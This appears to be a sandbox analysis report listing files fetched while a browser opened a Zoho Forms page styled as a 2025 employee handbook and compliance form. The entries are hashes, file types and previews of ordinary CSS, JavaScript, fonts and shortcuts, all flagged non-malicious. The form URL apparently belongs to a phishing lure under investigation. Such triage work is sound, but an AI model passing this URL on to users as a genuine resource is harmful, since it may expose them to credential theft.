                            Preview:L..................F.@.. ...$+.,.....xc.<l......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I5Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V5Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V5Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V5Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2693
                            Entropy (8bit):4.023389820158653
                            Encrypted:false
                            SSDEEP:
                            MD5:DFBCF542B4D1888137126D1D73FAF28B
                            SHA1:F6354716B1850D87C8E03458735C6D6B6C9EEF6E
                            SHA-256:214A1E857A5D93D889E0C7D5B7544FB4737EBC950AA94A95C22B6B51E51263E9
                            SHA-512:64B0D0EABB27E6267B745DC30F8F9979A82C090FB22ADA785BCCA6778E2C5D9623EE797F6E1F9223D4203B77417584BB257A328C8E505499FE6464E36E8D59F6
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I5Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V5Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V5Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 18:44:17 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2681
                            Entropy (8bit):4.013470449388183
                            Encrypted:false
                            SSDEEP:
                            MD5:F59E4943A82E5C8FB3932188742FB808
                            SHA1:253DD84D307085BEFB12BCA62856BCCB1E8F58FE
                            SHA-256:EEB0773B0B79D3E43379BB0C29AAAE07514243D55311E53ADB715B2EBD5B4840
                            SHA-512:9154146C923C87BB6A2CBE679ED88B5E93C1869A035B8E851E2272C3EA2C9983EAF2D0A6DE8DD56B914388656C657BB699DDB78AC9C907D44CB333565F02C79B
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,......[.<l......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I5Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V5Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V5Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V5Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 18:44:17 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2681
                            Entropy (8bit):4.00095328638025
                            Encrypted:false
                            SSDEEP:
                            MD5:9C91BCF23E0FD743EE489A3EA6E92615
                            SHA1:217ABB5662FF41A0ABB7B7F8D4FACC1B5ADE93E6
                            SHA-256:3EE4DB933CD8429B09894A9EDC4890CCEE23F2F986A585E2C15CD7FF8CA0E064
                            SHA-512:24909B64A2926C9C9CDE7B472A75EE63B25D94BFEE81E8145F45DDA435B33470F928F9F3BA2EEE5F8B08A6ACB776E5899592CF6EF137580038A5112AB32919E3
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,......k.<l......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I5Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V5Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V5Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V5Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 18:44:17 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2683
                            Entropy (8bit):4.014344203616851
                            Encrypted:false
                            SSDEEP:
                            MD5:3B378773B9D46A68C929CD98C33525DE
                            SHA1:8DC5CC6673B73DDFE95B17CD62EF0B829A04FED0
                            SHA-256:92E3AA6F28E3F5B179EFE33D8AF02BD39EA57EEE6C4985A6E92058FFE47D7291
                            SHA-512:AF160616F208FBAB0D11D405C5FE2FFD39E04C229351F2A28D0EF09BBBE95436E123B53D4883ED8C088A35B8FCBD846EF36AFC9DDFFC9DBCC0A2746CE9B24844
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,......O.<l......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I5Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V5Z......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V5Z.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V5Z.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65440)
                            Category:downloaded
                            Size (bytes):78475
                            Entropy (8bit):5.050086845440776
                            Encrypted:false
                            SSDEEP:
                            MD5:2755260429CD02C98112DAC6F4B5B8CE
                            SHA1:C0FDD6EC5E0C9F2B85D42E517C375F07BEC5BC2D
                            SHA-256:B2CEA84C60142EA60E4A2CE7FFC440387184266D0133F3141E5142EE4C160F8D
                            SHA-512:408F6EC5EF7D0F15EF71DCB2606B07F033450977C27FDD337754C4A62EC8CA5A095C5C5654A710D87AD31978BDD776C3FA9A02B7B956A292E19A85065C005B67
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/forms/css/formsthirdparty.2755260429cd02c98112dac6f4b5b8ce.css
                            Preview:/* $Id$ */./**. * IMPORTANT NOTE: This compressed css file includes thirdparty stylesheets. */../* * CSS Styles that are needed by jScrollPane for it to operate correctly. * * Include this stylesheet in your site or copy and paste the styles below into your stylesheet - jScrollPane * may not operate correctly without them. */.jspContainer{.overflow: hidden;.position: relative;}.jspPane{.position: absolute;}.jspVerticalBar{.position: absolute;.top: 0;.right: 0;.width: 16px;.height: 100%;.background: red;}.jspHorizontalBar{.position: absolute;.bottom: 0;.left: 0;.width: 100%;.height: 16px;.background: red;}.jspVerticalBar *,.jspHorizontalBar *{.margin: 0;.padding: 0;}.jspCap{.display: none;}.jspHorizontalBar .jspCap{.float: left;}.jspTrack{.background: #dde;.position: relative;}.jspDrag{.background: #bbd;.position: relative;.top: 0;.left: 0;.cursor: pointer;}.jspHorizontalBar .jspTrack,.jspHorizontalBar .jspDrag{.float: left;.height: 100%;}.jspArrow{.background: #50506d;.text-indent: -20
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:Web Open Font Format, TrueType, length 186632, version 0.0
                            Category:downloaded
                            Size (bytes):186632
                            Entropy (8bit):7.996181765515217
                            Encrypted:true
                            SSDEEP:
                            MD5:89A8048AA1A00347A7804446AF7D96CE
                            SHA1:187BBB7C6AA4D2BDDD49293D4F00A7CBF0504ADB
                            SHA-256:C410EC4820FD6AEFF0859FA8E8140C50E30D279FBBA8134EB1002F62F9DB5937
                            SHA-512:FCF3BA9D01310DF1399582ED86729F3B4C81F7140A3C96941DD9BAD3E0A39923634212CD67B5E2D861BABDFD17BD0A20650144428E8AD4C7ECE6C5D58F146B85
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/webfonts/interbold/font.woff
                            Preview:wOFF..............lH........................GDEF..M........././.GPOS..PH.._....(.../GSUB...@..(...UJ.U;.OS/2.......Y...`+.cmap...D..4K..e.5y.%glyf..a4...)....J'1.head...0...6...6,...hhea...h...!...$...[hmtx.......B..'.<<$.loca..G.......'...V.maxp........... ....name...`.......Z.5..post..!...,g..d..............~_.<..........."..........|.j.?............x.c`d`.Z.7..A..../.2Y.@.d.......W...x.c`d`.............+...x.%... .E..G!Dw..ml...l.!....E.B,^N^.....3.+p..[..(...~p9p..2B.";>g...\...V[..x..;}.j...x...tU.....3....D@.".2.Y.$`(.C..m..S.@..S^.....D..6L/.b..6 /2.Q."U....R.....e......{c.1.K..[.Z.........}..Pj........e.....6..).#.?W.OBe..P\...n..`^.F....BV.......%....C.@.u.r.m..........<.#VO.Ls2....nF`.9.3.....b.......>[.a.>..I.V..Q...v.#.U.....4F..(..bo.Sgv.&.......k....k=...S......tF.9..fw.....U.V.q....d%YF..w....F...fY_R ..ae.Q.:...."..#....]X#...j1..$.U..Fu-6(..|.<g<k...@>...y(}0....T.k.F...W0R/..IN...Wh.CZ"=.W.@TU..<.7.....o.7..W#n.._...h..2.;..F..R9...$.V
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:Web Open Font Format, TrueType, length 185600, version 0.0
                            Category:downloaded
                            Size (bytes):185600
                            Entropy (8bit):7.996827937909781
                            Encrypted:true
                            SSDEEP:
                            MD5:BEA6283573E7738982AF22A51D1CC41F
                            SHA1:B18E55C8C20E438554B26A4FCCB413B1D09CC9A9
                            SHA-256:23D29854736B859B1B854235B38DEBFE3E05FD5340DDE28C8DEDBE1183A7CF3E
                            SHA-512:C023DEE931DFA247EA29EC6D815E34CD08476C8A11624F1F6063182E8D19A77967007AD6DEB454AAA9F90ADB95595B3F3071C6AB992D39CC1B6730CC909835D0
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/webfonts/intermedium/font.woff
                            Preview:wOFF..............o.........................GDEF..I........././.GPOS..L..._...-rL..GSUB...8..(...UJ.U;.OS/2.......Z...`+..jcmap...$..4K..e.5y.%glyf..a...........Ahead...0...6...6-...hhea...h...!...$....hmtx......."..'....loca..Gp......'...jcmaxp........... ....name..............0post...d..,i..d..n..........M{.D_.<..........."......'...|.j..............x.c`d`.Z.7..A..../.d..."..3........x.c`d`...0..........)...x.c`a.a........6....2.f..p..H31.13.(...\..........!(.7.......\+.F00p.`Z...8.$.......x.t9.P..x...tU...........XJ.b]U.QAi.B.1AF.....B. ..0L...!....@h..$.6..A.D@F-B....x....{/....=7.@..a.z.Y.....o.........Z>:.D<r.m....{H4......j.1+..FY%."...pZ........Bj.Pf.a[..c...P&P.n..o....]'....y..8.t...G0.8..._b.)#Q...zW...m.y..e.$..?..}..G..+y...Zq..c..mYL6..<.2...2.....(0.......=....E.E.p}..x...\....1.........&+.j...w.3.@.E>a^+..z....)...H.J..-E..O~...(...P...c..lR..H...e).B.YY...P...<<......oW.."....}...........'.....p=.....v.1.*Z...u...u..Ci...aeV....j.....1.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (17941), with no line terminators
                            Category:downloaded
                            Size (bytes):17941
                            Entropy (8bit):4.915719930081868
                            Encrypted:false
                            SSDEEP:
                            MD5:972D2CEE263C403AB3CD7D4CCD60471E
                            SHA1:18619A0D67B2266FE276DA4A6041699A5B47C185
                            SHA-256:37AACEEF36CA412A813B124CFEA22E7A327BFF06F135931DBF08CFE7F093ED4B
                            SHA-512:B43D51D1B4C17BDE09DBE907059D9B186801B112F684F6AB4A8ABE57372F737E98C3373C70484897DCA8BCF364286D4DB2C9FFD8506709D975970D276A35A3DF
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/forms/css/fullpageformmobilemedia.972d2cee263c403ab3cd7d4ccd60471e.css
                            Preview:@charset "UTF-8";@-webkit-viewport { width: device-width;}@-moz-viewport { width: device-width;}@-ms-viewport { width: device-width;}@-o-viewport { width: device-width;}@media only screen and (min-width: 0px) and (max-width:780px) { ..fieldtypeText input[ui_type="textbox"]~em.inputClearDiv:hover {....cursor: default;.}}@media only screen and (min-width:0px) and (max-width:768px) { ../***************************************. NameField (0-768).***************************************/. ..ofSubformWrapper .zfNameContainer {..flex-direction: column;.}..ofSubformWrapper .zfNameContainer .nameCompLabelWrapper {..width: 100%;..margin-bottom: 15px;..margin-left: 0px;.}..rtl .ofSubformWrapper .zfNameContainer .nameCompLabelWrapper {..margin-right: 0px;.}}@media only screen and (min-width: 481px) and (max-width:768px) {../*.Below 481px, '-' icon will be hidden between spans. ..From 481px to 768px, '-' icon will be made visible, along with meida query handling */ .zfPhoneUSA sp
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:downloaded
                            Size (bytes):153124
                            Entropy (8bit):5.636632276041688
                            Encrypted:false
                            SSDEEP:
                            MD5:4C262D610219D4D89440EC5C6F6E3E67
                            SHA1:F9320F4BBBFA7DCD76AD155487889E8C36ADBF9E
                            SHA-256:C4F8F0E9EA64E2765BBD710EF760542CC98FF3388D27E3B1B33BAD83E1E2C329
                            SHA-512:57699E311E9194BF60133083DA3471AE91F06A26B793028231C578AC0ABE08EBBA25AF8978DF3EC150AF28A557C9529C2BE56BC2C77AD232B3AA4CA264686011
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/forms/js/formscommonlive.4c262d610219d4d89440ec5c6f6e3e67.js
                            Preview:var ZFConstants={SAVE_RECORD_STATUS:1},ZFHttp={GET:"GET",POST:"POST",DELETE:"DELETE",PUT:"PUT"},ZFMimeType={APPLICATION_JSON:"application/json"},ZFFormField={ADDRESS:{MAP_INFO:"_Map_Info",COUNTRY:{KEY:"_Country"},STATE:{KEY:"_Region"},CITY:{KEY:"_City"},ADDRESS_LINE1:{KEY:"_AddressLine1"},ADDRESS_LINE2:{KEY:"_AddressLine2"}},NAME:{SALUTATION:{KEY:"_Salutation"}}},SystemGeneratedField={PAYMENT_AMOUNT:{LINK_NAME:"PaymentAmount"},ZF_ADDED_LATITUDE:{LINK_NAME:"zf_added_latitude"},ZF_ADDED_LONGITUDE:{LINK_NAME:"zf_added_longitude"},ADDED_LANGUAGE:{LINK_NAME:"ADDED_LANGUAGE"},VERIFY_PERMA:{LINK_NAME:"VERIFY_PERMA"},REFERRER_NAME:{LINK_NAME:"REFERRER_NAME"}},ZFFieldTypeConstants={SINGLE_LINE:1,MULTI_LINE:2,NUMBER:3,CURRENCY:4,DATE:5,TIME:6,NAME:7,ADDRESS:8,EMAIL:9,WEBSITE:10,PHONE:11,DROPDOWN:12,RADIO:13,CHECKBOX:14,MULTIPLE_CHOICE:15,DATETIME:16,SECTION:17,DECISION_BOX:18,FILE_UPLOAD:19,DECIMAL:20,RATING:21,HTML_TEXT:22,SLIDER:23,SIGNATURE:25,GEOLOCATION:26,FORMULA:27,UNIQUE_ID:28,IMAGE_CHOI
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65433)
                            Category:dropped
                            Size (bytes):992552
                            Entropy (8bit):5.4061708449879875
                            Encrypted:false
                            SSDEEP:
                            MD5:48CA8D29DF26E8FEE4BF7E47A5610F30
                            SHA1:9B80305F13875A092FA4553086B440203E2DF986
                            SHA-256:E68241C21A14DE42106B511F42ED3D4B10090250E494FC73F9751844F8F1A2C1
                            SHA-512:3E629D7EBE33FFC3FE5280E0E63DBE70E25BB5452CBA80126F1D681FD804779CD871BFD49AFFDD6EACA5E1FC9BD3AF7A31DFA040304C1C254D4F3245ADAFFECB
                            Malicious:false
                            Reputation:unknown
                            Preview:// $Id: $./**. * IMPORTANT NOTE: This compressed js file includes Zoho Forms Forms/Report live js.. */.function ZFLiveFormFocusHanderOnNavigation(actionType,pageNo){this.actionType=actionType,this.pageNo=pageNo}function ZFLiveFieldFocusHander(fieldElem,forError){this.fieldElem=fieldElem,this.isDisabledField=$(fieldElem).hasClass("fieldDisabled"),this.isFocusForError=void 0!==forError&&forError}function setFocusForElementThatCannotBeFocused(focusElem,callBackOnFocus,callBackFunctionParam){if(isSfChild(focusElem)){var scrollToViewElem=$(focusElem);if("livefield-elem"!=$(focusElem).attr("elname")){var closestFieldElem=$(focusElem).closest('[elname="livefield-elem"]');$(closestFieldElem).length>0&&(scrollToViewElem=closestFieldElem)}$(scrollToViewElem)[0].scrollIntoView({behavior:"auto",block:"center"})}if(isEmbeddedForm()&&(isMobileBrowser()||isSafari()))setTimeout(function(){var hiddenInput=$("<input />");$(hiddenInput).attr("type","text"),$(hiddenInput).attr("style","position: absolute;
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with very long lines (12300)
                            Category:downloaded
                            Size (bytes):57788
                            Entropy (8bit):5.487569889131067
                            Encrypted:false
                            SSDEEP:
                            MD5:DE5EFCB451E4AC4A6FBF4B5A38633E4B
                            SHA1:26D72F9C846700A3DDEA898A9E014D5E46559A7D
                            SHA-256:B2743D9753321202EB9FB893B9A5095F3967E99483917A790ECA24DE5BDB98A3
                            SHA-512:57701A4730FCE88A12E4C0F76857BDDCD573BF0E69E76159FF743D540AD636C1AB6473CBE0EC4948B819D909C91EFFA1773D635C0A7230E03C94E7D95C0042F1
                            Malicious:false
                            Reputation:unknown
                            URL:https://forms.zohopublic.com/philhdr1/form/2025EmployeesHandbook/formperma/GrVUygSKNf4o4V5HIfB_T9v6K96eG8oZnr1iSlS9nJM
                            Preview:.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> .<meta http-equiv="x-ua-compatible" content="IE=edge" />.<html xmlns="http://www.w3.org/1999/xhtml"><head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="MobileOptimized" content="width"><meta name="HandheldFriendly" content="true"><meta http-equiv="cleartype" content="on">. To disallow zoom in mobile browser, maximum-scale to 1 in form live page. -->.<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1"/>.<meta property="og:title" content="The&#x20;2025&#x20;Employee&#x20;Handbook&#x20;And&#x20;Corporate&#x20;Compliance&#x20;For&#x20;All&#x20;Employees" /><meta property="og:type" content="website" /><meta property="og:url" content="https://forms.zohopublic.com/philhdr1/form/2025EmployeesHandbook/formperma/GrVUygSKNf4o4V5HIfB_T9v6K96eG8oZnr1iSlS9nJM" />.<meta property="og:desc
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (48120)
                            Category:downloaded
                            Size (bytes):48121
                            Entropy (8bit):5.399559475473033
                            Encrypted:false
                            SSDEEP:
                            MD5:240198B7133FAF43160703113AA2F601
                            SHA1:AB61FEDDAE321268BD84839B8908E611E9300AFD
                            SHA-256:401258036014BCC401F7894FD5ACC7D6BA31CDF3162C1D55EBB219D908BCF496
                            SHA-512:F49972AE131DE7EE33D86472471237580A1055C2E086BE0266E7171CB9C423A99145B006CF5D25E25288E64440430E43782E976BF7EC117BDAA52E5D370AB139
                            Malicious:false
                            Reputation:unknown
                            URL:https://challenges.cloudflare.com/turnstile/v0/g/672eb098a9f3/api.js
                            Preview:"use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Bt(l,o,c,g,h,"next",s)}function h(s){Bt(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Ue(e,c,a[c])})}return e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:Web Open Font Format, TrueType, length 175648, version 0.0
                            Category:downloaded
                            Size (bytes):175648
                            Entropy (8bit):7.996271601919218
                            Encrypted:true
                            SSDEEP:
                            MD5:17D8DA6B34796DDE1DBA5DD9006A745F
                            SHA1:612242DEC204126762922AAB9D36CC9B61A5F26B
                            SHA-256:BBFEED460987EE04BB702883DC457DE25CF1E000BD18E36EAD5E2C64BB5B140C
                            SHA-512:D69A447C8AAF8B146F67CC6E2C5F1BE56720F6239E454CEE04A03593A47A0EDDF1DE56BEB53B04B289948BEE6FCFD7551AC6E9E71D15613324BEDE4EDBF8657D
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/webfonts/interregular/font.woff
                            Preview:wOFF....... ......Lp........................GDEF..+........././.GPOS......V....F....GSUB...X..(...UJ.U;.OS/2.......Z...`*..bcmap......4K..e.5y.%glyf..^..........1r.head...0...6...6....hhea...h...!...$....hmtx..........'...Ndloca..Dd......'.....maxp........... ....name...........r.k.}post...x..,i..d..d.............r_.<.....................|.j..............x.c`d`.Z.7..A..../_d..."..3..W.....x.c`d`...0..........)...x.c`a.c........6....2.f..p..H31.23.(...\..........!(.7.......\+.F00p.`Z...8.$.......x.O.....x..?H.]...$o..s....a..EXRXXX..E..X.....,,d..)."K..),. ..........|."C...A..RX.`!.,)..5....9.D.....w...~<..{.>.yNL.e ..eY.F..}..]...a...5.~.....s2xBGJ..4..@. ...,{*...$..E.Lx..R.Jb..\}EY./_H?Q...?.k.H..F...p!.A.f../.V...J9.r.W.9.)...D.%f...#.#..A.'.L..%......t3.t.....n..J.DJ.|..~.....(...z.....l..)x....w..[....:..d.-.,]oM..=..4...g.q....n)..)....._..rz....F..\.A....^..z.X..G.Ndj......?.^z.`^..&...g./..&..O...M....d5.|M..)r..7I.Y.[R..q.^...a?Y...L.O5.n*.,.V!O..J.vS.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                            Category:dropped
                            Size (bytes):15086
                            Entropy (8bit):4.295627021172907
                            Encrypted:false
                            SSDEEP:
                            MD5:F337BA4DF49F92F0A9AF92E5D6E998BF
                            SHA1:084B93B4EEA61FDE3088C940C26B289E68EF7E18
                            SHA-256:F7E3C6210F6CF6CA4C4036F013E9A8C10248968B125AA0F9FAAE6F4DDF2E3D28
                            SHA-512:F5FCEFB408FF0ECC52B751B21BDE5DEAF3849ECA1D8A6C804F398862935D85B5EE9EC72447703118CCA99ABA65A85302274B0790EB45555FEF048E6E2D4FEC1F
                            Malicious:false
                            Reputation:unknown
                            Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$.................................................T...................................^...w...........................................................................................T...................................................-...................................................................................................................................................-.......................................:...........................................................................................................................................................:.........................................................i...g...g...f...}...................m...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...i.......................................................................X...F...E...E...E...E...D.....z.........p.=.C...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (64217), with no line terminators
                            Category:downloaded
                            Size (bytes):74461
                            Entropy (8bit):5.37233311629974
                            Encrypted:false
                            SSDEEP:
                            MD5:B9384DCADF2BC7B3816527891DF599F6
                            SHA1:CED56B595561E2F4B2F8E8790F4BB09D3603D1D8
                            SHA-256:9D04AB031D6B175C7A9394B5BE9D26010788D65A41A7A40595D01A6F2941E77A
                            SHA-512:B77C28EE5E6BFB8C02A2FC1F1F0E40AE578C5502C5DEF8F9295025F26FC5375331C8D59877921E469021CFC7347E093F38B39CC79FD6729AD88BCE6CF5B5EED5
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/forms/js/formsselect.b9384dcadf2bc7b3816527891df599f6.js
